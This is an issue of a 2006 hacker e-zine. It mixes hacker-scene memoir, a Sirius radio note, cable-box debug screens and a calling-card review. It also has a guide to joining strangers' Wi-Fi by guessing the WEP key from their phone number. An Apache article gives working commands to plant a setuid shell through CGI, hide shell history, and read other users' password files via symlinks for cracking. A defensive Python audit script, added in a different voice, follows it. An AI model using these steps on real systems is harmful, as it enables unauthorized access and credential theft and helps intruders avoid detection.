PoR Issue 04

PPPPPPPPPPPPPPPPP RRRRRRRRRRRRRRRRR
P::::::::::::::::P R::::::::::::::::R
P::::::PPPPPP:::::P R::::::RRRRRR:::::R
PP:::::P P:::::P RR:::::R R:::::R
P::::P P:::::P ooooooooooo R::::R R:::::R
P::::P P:::::Poo:::::::::::oo R::::R R:::::R
P::::PPPPPP:::::Po:::::l33t::::::o R::::RRRRRR:::::R
P:::::::::::::PP o:::::ooooo:::::o R:::::::::::::RR
P::::PPPPPPPPP o::::o o::::o R::::RRRRRR:::::R
P::::P o::::o o::::o R::::R R:::::R
P::::P o::::o o::::o R::::R R:::::R
P::::P o::::o o::::o R::::R R:::::R
PP::::::PP o:::::ooooo:::::oRR:::::R R:::::R
P::::::::P o:::::::::::::::oR::::::R R:::::R
P::::::::P oo:::::::::::oo R::::::R R:::::R
PPPPPPPPPP ooooooooooo RRRRRRRR RRRRRRR
/-----------------------------------------------------\
(------------------=PoR Release # 4=--------------------)
\-----------------------------------------------------/

.oO-++++++++++++++-Oo.
.oO MEMBERS Oo.
.oO-++++++++++++++-Oo.
.oO Enamon Oo.
.oO Gonzo Oo.
.oO I-baLL Oo.
.oO Judas Iscariot Oo.
.oO MikeTV Oo.
.oO Murd0c Oo.
.oO Rob T. Firefly Oo.
.oO Scientist Oo.
.oO Sephail Oo.
.oO Venadium Oo.
.oO-++++++++++++++-Oo.


IN THIS ISSUE:

x. Notes From The Editors - Enamon / I-baLL
x. Free Books - Ilya G
x. Meetings - Gonzo
x. Geek Squad Wi-Fi Settings - Murd0c
x. Sirius Notes - Judas Iscariot
x. Scientific Atlanta Explorer 3100 - Hackawelsh
x. A Review of Duane Reade Calling Cards - I-baLL
x. Having Phun with Apache - duper


X---------------------------------------------------------------------------X

NOTES FROM THE EDITORS:

/-----
I-baLL
-----/

So it's July 5th, 2006. It's been almost 1.5 years since the last PoR issue.
That's 1 point 5, not ffifteen. It's warm here in this room but that's
because I closed the window. This sucks. New York City in July and the
weather people are predicting that the weather won't break 90 for the whole
month! I'm not exactly in a writing mood. I'm dehydrated, hairy, and
listening to "Dark Side of the Moon." Writing these intros is my procedure
to get into an editing mood. Night is drawing fast and I'm rambling.
Whatever.

Before I let you guys and gals go I might as well give you some notes, quick
updates, whatever.

The articles below were all submitted over the past year. The information in
them might be a bit outdated but I'm still leaving it all in the issue.

Oh, one other thing... HOPE Number Six is coming up on July 21st!

Gonzo and I are going to be giving a talk on "Weird Technology" on Friday,
in Area B, at 7pm. Be there!

/-----
Enamon
-----/

Due to the lack of time I did not proofread this issue. Our next issue,
however, should be cleaner, neater, and nicer (like some high-priced whore.)

X---------------------------------------------------------------------------X
:
Free Books :
:
Ilya G ;
,,,,,,,,,,,,,;

I've developed a simple method for legally reading books for free over the
Internet. You'll need patience, some free time on your hands, and a Google
user account.

1) First, you'll probably want to go to Amazon.com, search for the book you
want to read, and see if it lets you read the first page with their "Search
inside this book" feature. If you can do this, you're all set to go. Get to
the first page of the book and copy down or memorize a distinct sentence
from the page.

2) Google has a Book Search feature. Go there, type in the book's title and
the sentence you just copied down, and it'll give you that same page. Start
reading. It will allow you to go forward to two additional pages. When you
reach the third (and last) page, copy down a distinct sentence from it and
type that in again. The result will give you that page, and will allow you
to go to two additional pages once again. Keep doing this.

3) After approximately nine pages, you will reach a warning telling you that
you can't see that page. But, you hopefully WILL be able to see the very top
line of that page. Copy it down. You can't read it here, but you can through
Amazon's "Search inside this book" feature. Type in that sentence from the
blocked page into Amazon and read the page there. Once finished, don't read
any further. Amazon's limit is about 40 pages, and you don't want to use
that up. When you finish reading the blocked page from Amazon, look back to
step 2 to return back to Google. That page may be blocked, but it will give
you the next two pages anyway (and you just read that blocked page on Amazon,
so you skipped nothing).

You can keep doing this over and over, going through an entire book. If
Google decides to stop you (hasn't happened to me yet), you always have
Amazon to go back to and keep reading. If you reach Amazon's limit of how
many pages you can read, it will be reset after about a week. Also, if you
have a Gmail account, you should have a giant load of "invites" (I have 100),
which you can give to yourself and create extra Google accounts to keep
reading. Sure, it might take time with all the copying and pasting, but at
least you can read an entire book over the internet, and it's perfectly
legal. All you're doing is abusing the system, not breaking it.

X---------------------------------------------------------------------------X
:
Meetings :
:
Gonzo ;
,,,,,,,,,,,;


In those days, my L.O.S. days, it was something we had talked about. Sure,
we knew about 2600, and its meetings, but we never went. I'm not even sure
if N.J. Transit's "Midtown Direct" service was around then, so even if we
would've gone in, I'm not sure how we would've done it. Looking back at it
now, we should have.

After L.O.S. disbanded, I kept up with things, and did what I could. One
night, I was watching a t.v. program about hackers, and it mentioned Off
The Hook. I made it a point to check out the show. Many blissful nights
were spent on my bedroom floor listening. Then, I heard something
mentioned about an upcoming conference called "Beyond H.O.P.E." I had to
go, and I did.

I remember calling N.J. Transit's customer service, and was told that there
is, in fact, a way to go directly into Manhattan. This was my way home.
Getting in was no problem, either. My friend, Rachael, had to go to the
Village to do some shopping, and she gave me a lift in. I was a bit nervous
while I was walking to the corner of Lafayette and Houston, and into the
Puck Building.

I felt incredibly out of sorts there. I was alone, knew no one else there, and
had no idea what to expect. I roamed around for a bit in the vendors' area,
and saw someone selling books, and one of them was Jim Keith's Black
Helicopters Over America. That was Bob The Bopper, a.k.a. "Conspiracy Bob"
at the N.Y.C. 2600 meeting. I was into conspiracies and learning about the
evils of Big Brother and the N.W.O. I talked with some chick that worked on
"Steal This Radio." I played the Double Dragon game that was there, and I
even remember seeing Phiber Optik standing in line to buy a Major Hacking
cookie. I left later in the day. Standing out in front, waiting for a cab,
I met someone else, Skarecrow, and we're still friends to this day. Then,
I heard a two-way radio go off. It was someone doing security, and there
was an announcement that someone was jamming the live broadcast of Off The
Hook. Some scrawny guy with glasses started running all over the area
looking into car windows and around corners to see what was going on. That
was Rebel. We weren't then, nor are we now, friends. A whole new world had
opened in front of me, and I HAD to walk in.

In October of that year, '97, I went to my first 2600 meeting. I wasn't
alone, though. At the time, there was someone else I was trying to teach
about hacking, and it later turned out to be a waste of my time, but at
least I had someone else there. I was hoping to see a familiar face, but
none were to be seen. My then friend and I were standing outside of the
then known Citicorp Building. I can't even remember what we were talking
about, but I heard a voice.

"You're new here, aren't you?"

That was Lupus. He and his friends, whose names I can't remember, introduced
themselves, and brought us into the conversation. I talked about the group
I was in, and was surprised that others remembered us. That was the day I
learned about cloning a cell phone. Lupus left early, for some reason.

"Someday, the body will be the ultimate hack" he said over his shoulder to
me as he headed up to the corner. I never saw him again.

I had no idea what I had just gotten myself into. The meetings became, and
are still, so important to me that I would social engineer my way into
leaving early on the first Friday of the month just so I could go in.

I haven't missed a meeting since '99, and my head spins when I think about
all that's happened, all the scrapes with feds, drugs, roaming around in
Barnes and Noble, holding court in restaurants, meeting Kevin Mitnick twice,
conferences, 9/11, and the vast cast of characters, those who came, and those
who stayed.
I have overly strained relations with my biological family, so 2600 has
become my chosen family. Family, or, more appropriately, chosen family is
something I learned the importance of a long time ago and family is one of
the dearest things to me. God only knows how many times they have been there
for me, and I don't think I'll ever be able to properly show my gratitude.

It's not surprising that I get nostalgic often when I think about the times
I've had, like coming back to Dover on an insanely quiet summer night, and
listening to Art Bell, and every other thing that's happened to me that I
fall in love with over and over again. I even have a hacker pop culture
ritual that I do just so I'll be in the right mindset for this long
download, and I won't click "Cancel".


X---------------------------------------------------------------------------X
:
Geek Squad Wi-Fi Settings :
:
Murd0c ;
,,,,,,,,,,,,,,,,,,,,,,,,,,,,;


Have you ever been sitting around in your house, or your friend's house, or
even some crazy family member's house and not had any internets at
all? I've come across a little something that will help you get wifi a little
easier. Now, I must stress this is only from my personal experience and it
might not work for you.

Now, since lots of people don't know how to set up wireless routers, they
usually leave it to 'the professionals'. Really, they leave it up to Best
Buy's Geek Squad. From what I've learned, Geek Squad sets up the routers
like this.

SSID = Last name of the customer
WEP (almost always WEP) = Customer's home telephone number

So, say you're sitting at your friend's house and you see an encrypted
network with the SSID "Davidson". Fire up Google and do a search for
Davidson + the town you're in. This should usually yield an entry somewhat in
proximity to where you're at, either on your street or one over.

I've tried this out a few times in various parts of the country and it
hasn't failed me yet. Perhaps this will entice Best Buy to stop being so
fucking stupid when programming their routers.

P.S.: This article is so crappy because it's last minute stuff. Sorry :(


X---------------------------------------------------------------------------X
:
Sirius Notes :
a.k.a. :
Sirius Satellite Radio Activation Process Bamboozala 2006 :
:
Judas Iscariot :
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;


So 2006 is upon us. No more wardrobe malfunctions, P Diddy name
annexations, or lip-synching performances on Saturday Night Live. A
new year brings us new technology. Sirius Satellite Radio and Howard Stern
want YOU to join the digital army and abandon terrestrial radio altogether.
No commercials, no FCC, and tons of categorized channels and styles for
your audible pleasure, for a nominal fee!

I've decided to write this article not in the sense of "h3r3's t3h h4x!!"
but more as a traditional info-spective. I recently came to acquire a
Sirius car kit with a stylish receiver (mmm... blue LEDs!). I ran through the
new-customer activation over the 800 number as opposed to internet ordering.
After completing the process I sat testing out the new receiver, going over
in my mind the underpaid inbound telemarketer's script. The entire
activation process flowed through my cranium, searching out the pieces of how
the system works. Kind of a shoot-from-the-hip, technologically rooted
theory. With that, I present to you the Sirius Satellite Radio Activation
Process Bamboozala 2006!

After calling the 1-800 activation number, an IVR comes up stating that with
the recent holidays they are experiencing an influx of callers and hold times
are currently extended. I was immediately dropped to a horrible, faint
stream of the country channel. I'm guessing whoever set up the box they're
running that off of either has the encoding (along with the volume) way too
low, or the phone system was acting up. 30 minutes later I was
greeted by a man named Raul. I told him I wished to activate my ubercool
new radio. He proceeded to rape my docs and I had to give him my name,
address and email address for which I declined (SPAM!). Raul then asked for
a very important piece of information. The way the receivers are activated
are by a 12 digit Sirius ID (SID) number. Any hacker worth his salt will
tell you this will be the first thing to attack. Take your mac address
spoofing skills from your college Comp Sci class and apply it to the SID.
You may be asking "How the phuck do I do that?" I don't know! Truthfully,
I don't know **** about radio freqs and the such, so I did some searching
and found this guy who thinks he knows what he is talking about.

drktitan56 writes "SIRIUS uses a QPSK (Quadrature Phase Shift Keying)
for its modulation scheme. If you look around on the internet you can
get the schematics for a QPSK (four level) decoder and you can get all
the parts to make one from Radio Shack for about $10. The frequency for
SIRIUS is 2.32 GHz and the signal bandwidth is 12.5 MHz for the whole
system. The QPSK will not work if the receiver you have uses the TDM
(Time Division Multiplexing)."

So, is this the way to decode the signal and possibly recreate it with
spoofed info thereby allowing you free 0-day spl0itz? Possibly. I'm simply
providing the inf0z possibly inspiring some poor ham to start experimenting.

The rest of the activation process was mostly more raping of the d0cz,
setting up a sirius.com user name and password, and setting up a payment
plan. Nothing else technical was done except when they send you the magic
"activation signal". Your receiver grabs an update from the signal and
starts to load the channels into the unit. Nothing shady about that. All
in all, the main weakness lies in the SID. I've looked into getting the
company to clone my SID into a separate unit that I would purchase, but they
told me this could not be done. Only secondary units can be added onto the
account for a lesser fee per month. The billing system lists all registered
radios under each customer account. While this doesn't help in getting free
service, it's still a cool fact nonetheless.

How do you get free satellite radio? I don't know. As I previously stated
in my opening (loalz, in my... forget it), I am simply giving
information, purely from a skeptical consumer's point of view. Mostly I
want to light some fires under people's asses so this new technology can be
explored. ¡Feliz año nuevo! (Happy New Year!)


X---------------------------------------------------------------------------X
:
Scientific Atlanta Explorer 3100 :
:
Hackawelsh :
Inspired by Judas Iscariot :
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;

SCIENTIFIC research in the ATLANTA Georgia area shows that _3100_ is a
number...
By Hackawelsh
Inspired by Judas Iscariot

[A: COPYRIGHT HACKAWELSH 2005: HOT GIRL LICENSE]-----
I don't give a shit what you do with this document, however, if you are
a hot girl, by reading this, you consent to any number of sexual
activities I may desire to engage in with you, should we ever meet at a con,
or in a dark alley.

[B: DISCLAIMER]--------------------------------------
I don't know shit about fuck when it comes to hardware, so most of this
crap is being pulled out of my ass, and other orifices.

[1: Narrative/rambling intro]------------------------
Fucking cable's out. The little LED display on the front of the box shows
random numbers instead of the time. Bastards. Called them up the other
day; said they couldn't fix the problem from their HQ. They had to send
someone out today. He couldn't fix it either; said they have to run
new lines to the house.

One plus, however; I noticed how the cable tech was entering debug mode
on this particular box, so I did a little exploring of my own. Note
that because my cable was out the fruits of my labor may be more or less
ripe than your own.

[2: Accessing Debug Mode]----------------------------
Accessing debug mode is no major secret, it's similar to the older
boxes documented on dslreports [1]. All you do is hold down the "diamond
button" (the one in the middle of the arrow keys) on the front panel
of the cable box until the little envelope LED lights up, at which point
you press info.

Congratulations, step one of Gibson Hacking is complete.

Navigating through the system is fairly straight forward with the arrow
keys on the box. The tech d00d was able to press a sequence on the
remote and navigate using the remote, but I didn't catch what he pressed
and was unable to reproduce such results.

[3: Linux Potential]---------------------------------
"The Explorer DHCT features a 32-bit, 130 MHz RISC microprocessor; an
Internet Protocol-based, real-time reverse path DAVIC transmitter; and an
out-of-band control channel that can support interactive or
session-based services." [4]

To me "130 MHz RISC microprocessor" means this thing is screaming for
someone much more leet than myself (there are very few people that fit
this description, however) to run Linux on this thing.

But I'm sure someone could install Linux on a Tamagotchi if they wanted
to so that's not really that cool...

[4: Hax0ring Their N3tw0rk]--------------------------
Page 3 of the diagnostics mode was what I found to be most interesting.
They have the MAC addresses of 4 devices. Three of them had the same
prefix, 00:02:DE, which, after a quick lookup on coffer.com [3], I was
able to find were produced by Astrodesign Inc. These three MACs were
E-MAC, RF-MAC (these two were sequential) and ISE. The fourth MAC,
labeled ESE, was showing up "Unavailable." I believe that ISE means
"Internal Something or Other" and ESE means "External Something or Other",
and if I had service it would show the MAC address of a host or gateway
system of some kind.

I was surprised the prefix was not Sci At, but I did a little digging
on Astrodesign Inc (some Japanese company) and I don't think Scientific
Atlanta makes this kind of product. A little research was able to turn
up a PCI Board they make that smells like it could be the one in the
SA3100 [6]. Here's why I thought that:

"The board can be used for transmission of data contents for digital
broadcasting, as well as for input, output, and/or multiplexing of
transport streams from different types of hardware that use digital
broadcasting/communication transport streams."

I was unable to find anyone working with these boards on Linux, despite
their PCI-ness, and the potentially k-rad sploits. In case none of
what I'm incoherently rambling about is coming together in your noodle,
I'm wondering aloud (well in text, but STFU) whether or not someone could
get on the digital cable network through their PC if they had one of
these cards and some mad RE/driver writing skillz (I assume the specs are
not openly available).

[5: Fin]---------------------------------------------
That's all for now. I busted my ass on a nice summary of the
diagnostic pages, so Czech those out too, man.

[APPENDIX A: DIAGNOSTIC PAGE SUMMARY]----------------
The dslreports page has nice pictures of these screens, but they are
not of the 3100 and are slightly different. Among the differences, the
3100 has more pages (16) than the box they refer to.

Note: this was compiled while I had no cable service, results may vary.
I. STATUS SUMMARY
A. INITIALIZATION
1. Status
2. CPU/Bus
3. Ev Pool
B. MEMORY (table)
1. ROWS
a. Total
b. Free
c. Largest
d. Chunks
2. COLUMNS
a. System Heap
b. SARA Heap
c. Video Heap
C. RF PARAMETERS
1. Tuner
2. FDC
3. RDC
D. CLOCKS
1. Booted
2. Current
II. POST AND BOOT RESULTS
A. (Not Applicable)
1. Note: I believe if you have a working cable connection
this would be different
B. BOOT STATUS
1. UNcfg
2. BFS
3. SI
4. SAM
5. IPG
6. PowerKEY
III. NO TITLE
A. SOFTWARE VERSIONS
1. PTV OS
2. FLASH
3. App(s)
B. HARDWARE MODULES
1. HWConfig
2. BIP
3. AC3
4. BGATE
5. BCOM
6. TVP
7. RFModem
8. MAC
9. QPSKRX
10. QPSKTX
11. ISE
12. ESE
13. DDS
C. SERIAL NUMBERS
1. E-MAC
2. RF-MAC
a. Note: in my experience E-MAC and RF-MAC are
sequential mac addresses
3. ISE
4. ESE
IV. NO TITLE
A. STATUSES
1. Tuning Mode
2. Tuner State
3. TV Mgr
4. TV Res Err
5. Tuning Tbl
6. Channel
7. Source Id
8. BFS Dir
B. ETHERNET
1. IP
2. Subnet Mask
C. RF NETWORK
1. IP
2. SUBNET MASK
3. Hub ID
D. MPEG STATS
1. Video
2. Audio
3. PCR
4. PCR Lock
5. A/V Disc
6. PTS
7. PEI
8. PER
9. SER
10. RST
E. ENTITLEMENT AGENTS
1. ISE[1]
V. NO TITLE
A. CURRENT FDC
1. Freq
2. DAVIC
3. Status
4. Level
5. Seconds
6. Corr Bytes
7. Uncor Blks
8. Errs Avg/Inst
9. Total Bytes S/N
B. CURRENT RDC
1. Freq
2. Power
3. Delay
4. Retrans
C. CURRENT QAM
1. Freq
2. Tuning Mode
3. Status
4. Level
5. S/N
6. Seconds
7. Corr Bytes
8. Uncor Blks
9. Errs Avg/Inst
10. EQ Gain
VI. POWERKEY INFORMATION
A. NO SUBSECTION TITLE (table)
1. ROWS
a. EMMs
b. Time GBAMs
c. App GBAMs
d. Ext GBAMs
e. EMCs

2. COLUMNS
a. Received
b. ISE
c. ESE
D. NO SUBSECTION TITLE (table)
1. ROWS
a. ISE
b. Comm
c. Version
2. COLUMNS
a. Errors
b. Cmd/Err
c. Date.Time
E. NO SUBSECTION TITLE
1. Version
2. Prog Stat
3. Prog Entitle
4. Decrypt Stat
5. late Keys
6. Sub Expires
7. CA Time
8. EUT Update
9. Decrypt Fail
10. Last Late Key
VII. IPPV INFORMATION
A. NO SUBSECTION TITLE
1. ROWS
a. Prch GBAMs
2. COLUMNS
a. Received
b. ISE
c. ESE
B. LAST ATTEMPTED
1. Device
2. EID
3. Result
4. Time
C. LAST SUCCESS
1. EID
2. Time
D. NO SUBSECTION TITLE
1. FPM Poll
2. PPV Collect
VIII. QPSK SIK INFORMATION
A. RECEIVE STATISTICS (table)
1. ROWS
a. CA
b. Broadcast
c. DNCS
d. DAVIC
e. PassThru
f. OOB SI
2. COLUMNS
a. Ctrl
b. VPI
c. VCI
d. Off
e. Ovfl
f. Packets
B. TRANSMITTED PACKETS (table)
1. ROWS
a. Slotted Aloha
b. TDMA
c. Reservation
d. Ranging
e. Errors
2. COLUMNS
a. DAVIC
b. SA/RES
c. TDMA
IX. PPV SERVICE SUMMARY
A. PPV SERVICE
1. State
2. PPC Svc
3. Interstitial
4. Index Ver
5. Immed Ver
6. Event Svc
B. PPV EVENT
1. Title
2. Svc Index
3. EID
4. Secure Buy
5. Event
6. Advertise
7. Preview
8. Cancel End
9. GBAM
X. DIGITAL VIDEO STATUS
A. NO SUBSECTION TITLE
1. Freq
2. Tuning Mode
3. TV Mgr
4. Uncor Blks
5. Seconds
6. Level
7. Channel
8. BFS Dir
B. NO SUBSECTION TITLE (table)
1. ROWS
a. Free
b. Largest
2. COLUMNS
a. System Heap
b. Video Heap
C. NO SUBSECTION TITLE (table)
1. ROWS
a. ISE
2. COLUMNS
a. Errors
b. Cmd/Err
c. Date.Time
3. Sub Expires
D. NO SUBSECTION TITLE
1. ISE
2. Late Keys
3. FPM Poll
4. A/V Disc
5. PEI
6. Last Late Key
7. Decrypt Fail
8. PER
9. PTS
10. SER
11. RST
XI. VOD INFORMATION
A. Service Group
B. SI Received
C. Int
D. Ext
E. TABLE
1. COLUMNS
a. State
b. Session
c. Entitlement
d. Stat
e. Activated
XII. BOOTLOADER INFORMATION
A. Vendor ID
B. HW Model
C. HW Version
D. Bldr Version
E. Group ID
F. Image ID
G-J. Word 1-4
K. NVM Writes
XIII. SAM INFORMATION
A. DOWNLOADED APPS
B. ACTIVE SERVICES
XIV. SARA INFORMATION
A. Global Cfg
B. Addressed Cfg
C. IPG Daemon
D. EAS
XV. QAM CHANNEL STATUS (table)
A. ROWS
1. NOTE: Rows are simply numbered 1-15
B. COLUMNS
1. Chan
2. % Full
3. Pkts RX
4. Pkts Avail
5. Overflows
6. Seconds
XVI. QPSK CHANNEL STATUS (table)
A. ROWS
1. NOTE: Rows are simply numbered 8-19
B. COLUMNS
1. Chan
2. % Full
3. Pkts RX
4. Pkts Avail
5. Overflows
6. Seconds

[WORKS CITED]----------------------------------------
[1] dslreports' SCI AT Hardware FAQ:
    http://www.dslreports.com/faq/sciatl/3.1%20Using%20diagnostic%20screens
[2] That t-file Judas wrote for some zine:
    http://www.thesearenotthedroidsyourelook.info/porissue3.txt
[3] Coffer.com MAC Address Vendor Lookup:
    http://coffer.com/mac_find/
[4] Sci At Consumer Products: 2100/3100:
    http://www.scientificatlanta.com/products/consumers/Exp2100or3100.htm
[5] (OUTDATED) Sci At Spec Sheet on the 3100:
    http://sciatl.com/customers/Source/745880.pdf
[6] Astrodesign Multi-type PCI Board Product Inf0z:
    http://www.astrodesign.co.jp/en/product/catalog/cx570e.html


X---------------------------------------------------------------------------X
:
A Review of Duane Reade Calling Cards :
:
I-baLL :
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;


If you drop by your local Duane Reade drug store you'll see this rotating
stand filled with cards. Pre-paid credit cards, some other cards, plus Duane
Reade calling cards. As a spur-of-the-moment buy I bought me the calling
card.

The card that I bought has 500 minutes on it. I don't remember what it cost
me though but that's not that important. The card is kinda weird. The front
of the card says "Duane Reade" (obviously), but then it also says "BellSouth
Prepaid Phone Card", "Powered by Fast Card", and, on the back of the card,
it says: "Services provided by: U.S. South".

Anyways, the number to call to use the card is: 1-800-445-9268 (or, for
Spanish, 1-800-450-0530). You then enter your PIN (on my card the PIN is
written in the following format: xxx xxx xxxx), and then a voice prompt
says to enter 1 for calls in the U.S., the Caribbean and Virgin Islands,
basically all the places where the country code is 1+. Then it says to dial
011 for all other places. Whatever.

Here's the scoop on what's so good about the cards:

They pass no CPN.
They pass an ANI of 404-806-2699 (an Atlanta, Georgia exchange).
They allow you to dial toll-free numbers (though those do use up minutes).

Seeing how BellSouth is one of the names listed on the card, I decided to
call up 1-800-BELLSOUTH to see if the calling card passed any of my
information on the BellSouth network. The friendly BellSouth operator told
me that they were seeing the number as originating from 404-806-2699. That
meant that none of my docs were being passed.

So, overall, the card's not too bad. It's rechargeable (though I don't know
if you can use cash to do that), and you can make more calls without hanging
up by hitting the # key twice (a common feature on most calling cards.)


X---------------------------------------------------------------------------X
:
Having Fun With Apache :
:
duper :
,,,,,,,,,,,,,,,,,,,,,,,,;


Ever wanted to access local Apache resources but weren't exactly sure
how? If so, then keep reading; this article is for you! :-) The
following techniques assume that you have a local user account on the
machine where the Apache httpd daemon is running.

Typically, apache runs under its own user and group, configured by the
User and Group directives in httpd.conf. By default, apache executes CGI
scripts as itself, so a user who can create their own CGI scripts can
probably execute arbitrary commands as the apache user. If you have write
access to a directory that has the ExecCGI option enabled in httpd.conf,
creating a set-id shell binary should be easy enough. First, prevent your
shell history file from being written, to cover your tracks. Execute
something similar to the following beforehand:

bash$ export HISTFILE=/dev/null
tcsh> unset histfile

Refer to the man page for your specific shell. We'll print out the HTTP
Content-type header so there isn't a "premature end of script headers"
message stored in the httpd error_log; something like that might attract
attention.

$ id
uid=101(duper) gid=101(duper)
$ pwd
/home/duper
$ #ExecCGI UserDir
$ cat>public_html/test.cgi
#!/bin/sh
# Runs as the apache user, so do not rely on ~ (it would expand to apache's
# home, if HOME is set at all); the target directory must be writable by apache.
/bin/cp /bin/sh /home/duper/sh
/bin/chmod 6751 /home/duper/sh
/bin/echo Content-type: text/html
/bin/echo
/bin/echo
$ chmod 0755 ~/public_html/test.cgi
$ lynx -dump http://localhost/~duper/test.cgi



$ ./sh
$ id
uid=101(duper) gid=101(duper) euid=81(apache) egid=81(apache)
$

Of course, this trifle can be avoided by configuring suexec or disabling
CGI altogether. (One caveat on the set-id shell: bash resets its effective
uid at startup unless started with -p, so if /bin/sh is really bash, run
./sh -p.) But if you aren't permitted to execute CGI scripts, don't fret;
there are other ways to access apache files: the age-old symlink trick is
still in full effect. Simply make a symbolic link to the desired file from
your public_html directory and view it in a web browser. Give the link an
innocuous name, since an entry will be created in the server access_log.

This technique can be used to read any file the apache user has
access to, for instance .htpasswd files, which contain the hashed
passwords for HTTP authentication; crack the DES/MD5 hashes with john.
If you want to read another user's .htpasswd file:

$ ln -s ~user/public_html/.htpasswd ~/public_html/index2.html
$ lynx -dump http://localhost/~$USER/index2.html

Again, Apache can be reconfigured to handle symbolic links more
stringently. Setting Options -FollowSymLinks +SymLinksIfOwnerMatch in
the UserDir's Directory definition should stop such behavior, since the
server will then only follow a link whose owner matches the owner of its
target. However, a subtle variation of the symlink maneuver can circumvent
the security these directives are meant to imply. Observe that it is
possible to make the public_html directory itself the symbolic link.
So, if we don't have permission to read the server configuration file,
we have:

$ mv ~/public_html ~/public_html.tmp
$ ln -s /etc/httpd/conf/httpd.conf ~/public_html
$ lynx -dump http://localhost/~$USER

[...]

This can be real phun if the usual Indexes option is enabled for the
directory. That way, you can point the symbolic link at the conf
(or any other) directory and decide for yourself which apache-owned files
you want to read, but don't forget the access log is keeping a
record of the name of every symbolic link you're viewing. Page through
your local httpd.conf file for more goodies to gather. Have phun.
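As an added example (not code from the article or from the Apache project),
here is a small Python audit for the defending side of the two tricks above:
it flags symlinks inside public_html, or public_html itself, that resolve
outside the user's home, and it reads the UserDir <Directory> block of an
httpd.conf with Apache's own Options semantics (an unsigned Options line
replaces the set, +/- tokens modify it, All and None expand as documented)
to report whether ExecCGI, FollowSymLinks or Indexes are still enabled. The
user names, paths and the two httpd.conf fragments are constructed for the
demonstration; the hardened fragment is the -FollowSymLinks
+SymLinksIfOwnerMatch setting the text recommends, with ExecCGI and Indexes
turned off as well.

```python
#!/usr/bin/env python3
"""Audit a UserDir tree and its httpd.conf block for the symlink and CGI
abuses described above.  Added example; not from the zine or from Apache."""
import os
import re
import shutil
import tempfile

OPTIONS_RE = re.compile(r"^\s*Options\s+(.+?)\s*$", re.I)
# "Options All" enables every option except MultiViews.
ALL_OPTIONS = {"execcgi", "followsymlinks", "includes", "indexes",
               "multiviews", "symlinksifownermatch"}
RISKY = {"execcgi", "followsymlinks", "indexes"}


def escaping_symlinks(home, public_html="public_html"):
    """[(link, resolved_target)] for every symlink under home/public_html, and
    for public_html itself, whose target lies outside the user's home."""
    home = os.path.realpath(home)
    root = os.path.join(home, public_html)
    findings = []

    def check(path):
        if os.path.islink(path):
            target = os.path.realpath(path)
            if os.path.commonpath([home, target]) != home:
                findings.append((path, target))

    check(root)  # the "mv public_html; ln -s /etc/httpd/conf public_html" variant
    # Only descend into a real directory: os.walk would follow a symlinked root.
    if os.path.isdir(root) and not os.path.islink(root):
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames + filenames:
                check(os.path.join(dirpath, name))
    return findings


def enabled_options(block_text):
    """Apply Options lines in order: an unsigned line replaces the current set,
    +name/-name tokens modify it, None clears it, All expands."""
    opts = set()
    for line in block_text.splitlines():
        m = OPTIONS_RE.match(line)
        if not m:
            continue
        tokens = m.group(1).split()
        if tokens and tokens[0][0] not in "+-":
            opts = set()
        for tok in tokens:
            name = tok.lstrip("+-").lower()
            if name == "none":
                opts = set()
                continue
            names = (ALL_OPTIONS - {"multiviews"}) if name == "all" else {name}
            opts = opts - names if tok.startswith("-") else opts | names
    return opts


def risky_options(conf_text, directory="/home/*/public_html"):
    """Sorted list of risky options enabled in the <Directory directory> block."""
    pat = re.compile(r"<Directory\s+" + re.escape(directory) + r"\s*>(.*?)</Directory>",
                     re.I | re.S)
    m = pat.search(conf_text)
    return sorted(enabled_options(m.group(1)) & RISKY) if m else []


# Constructed httpd.conf fragments: the permissive UserDir block, and one that
# disables CGI, refuses links the user does not own, and hides directory indexes.
WEAK_CONF = """UserDir public_html
<Directory /home/*/public_html>
    Options Indexes FollowSymLinks ExecCGI
</Directory>
"""
HARDENED_CONF = """UserDir public_html
<Directory /home/*/public_html>
    Options -ExecCGI -FollowSymLinks +SymLinksIfOwnerMatch -Indexes
</Directory>
"""


def demo():
    """Build a throwaway /home with both symlink variants and run the checks."""
    base = tempfile.mkdtemp()
    try:
        home = os.path.join(base, "home", "duper")          # hypothetical user
        victim = os.path.join(base, "home", "user", "public_html")
        conf_dir = os.path.join(base, "etc", "httpd", "conf")
        for d in (os.path.join(home, "public_html"), victim, conf_dir):
            os.makedirs(d)
        with open(os.path.join(victim, ".htpasswd"), "w") as f:
            f.write("user:$apr1$constructed$notarealhash\n")   # constructed sample
        with open(os.path.join(home, "public_html", "index.html"), "w") as f:
            f.write("<html></html>\n")
        # Variant 1: an innocuously named link to another user's .htpasswd.
        os.symlink(os.path.join(victim, ".htpasswd"),
                   os.path.join(home, "public_html", "index2.html"))
        # A link that stays inside the home directory must not be flagged.
        os.symlink("index.html", os.path.join(home, "public_html", "same.html"))
        inside = sorted(os.path.basename(p) for p, _ in escaping_symlinks(home))
        # Variant 2: public_html itself becomes a link to the conf directory.
        os.rename(os.path.join(home, "public_html"), os.path.join(home, "public_html.tmp"))
        os.symlink(conf_dir, os.path.join(home, "public_html"))
        as_root = [os.path.basename(p) for p, _ in escaping_symlinks(home)]
        return {"escaping": inside, "root_escapes": as_root,
                "weak": risky_options(WEAK_CONF), "hardened": risky_options(HARDENED_CONF)}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

Run against a real box, point escaping_symlinks() at each home directory
and risky_options() at the live httpd.conf; a link that resolves inside the
user's own home is left alone, so the check does not fire on ordinary
public_html layouts.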

<don-o> tomwsmf: have you passed the heliopause and entered outer space?
<tomwsmf> Hail Jaurez full of bitz, thine zer0dayz are with ye


X---------------------------------------------------------------------------X
X---------------------------*-----*-----*-----------------------------------X
X---------------------------------------------------------------------------X
X---------------------------------------------------------------------------X
X-------------------------------------SEND ALL ARTICLE SUBMISSIONS TO:------X
X---------------------------------------------------------------------------X
X----PATTERNSOFRECOGNITION(AT)YAHOO.COM-------------------------------------X
X---------------------------------------------------------------------------X
X---------------------------------------------------------------------------X
X-------------------------------------OUR SITE IS:--------------------------X
X---------------------------------------------------------------------------X
X----HTTP://THESEARENOTTHEDROIDSYOURELOOK.INFO------------------------------X
X---------------------------------------------------------------------------X
X---------------------------------------------------------------------------X
